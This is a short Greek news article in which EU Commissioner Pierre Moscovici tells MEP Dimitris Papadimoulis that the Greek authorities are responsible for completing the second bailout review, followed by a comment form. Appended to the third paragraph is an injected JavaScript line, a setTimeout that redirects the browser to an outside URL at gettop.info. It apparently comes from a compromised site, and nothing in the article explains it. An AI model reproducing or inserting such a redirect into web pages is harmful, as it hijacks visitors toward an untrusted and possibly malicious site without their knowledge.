Μοσκοβισί: Υπεύθυνες για την επίτευξη του στόχου οι ελληνικές Αρχές

0
9

 

Ο Επίτροπος της Κομισιόν για Οικονομικές Υποθέσεις, Πιερ Μοσκοβισί αναφέρθηκε στον κοινό στόχο Αθήνας – θεσμών για άμεση ολοκλήρωση της δεύτερης αξιολόγησης.

Απαντώντας σε ερώτηση του αντιπροέδρου του Ευρωπαϊκού Κοινοβουλίου Δημήτρη Παπαδημούλη, αναφορικά με την ολοκλήρωση της δεύτερης αξιολόγησης, ο κ. Μοσκοβισί τόνισε πως υπεύθυνες για την έγκαιρη ολοκλήρωση της επανεξέταση του προγράμματος του Ευρωπαϊκού Μηχανισμού Σταθερότητας είναι κατ’ ουσίαν οι ελληνικές Αρχές και υπογράμμισε πως η Κομισιόν θα παρέχει τεχνική βοήθεια προκειμένου να διασφαλιστεί η έγκαιρη ολοκλήρωση της αξιολόγησης.

Επιπλέον, ο Επίτροπος εξηγεί πως ο Ευρωπαϊκός Μηχανισμός Στήριξης ήδη έχει προχωρήσει σε προσπάθειες για τη «βελτίωση του προφίλ αποπληρωμής του χρέους της Ελλάδας και τη μείωση του κινδύνου επιτοκίου», ενώ σημειώνει πως οι ευρωπαϊκοί θεσμοί εξετάζουν μεσοπρόθεσμα μία πιθανή παράταση στη διάρκεια των δανείων του Ευρωπαϊκού Ταμείου Χρηματοοικονομικής Σταθερότητας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here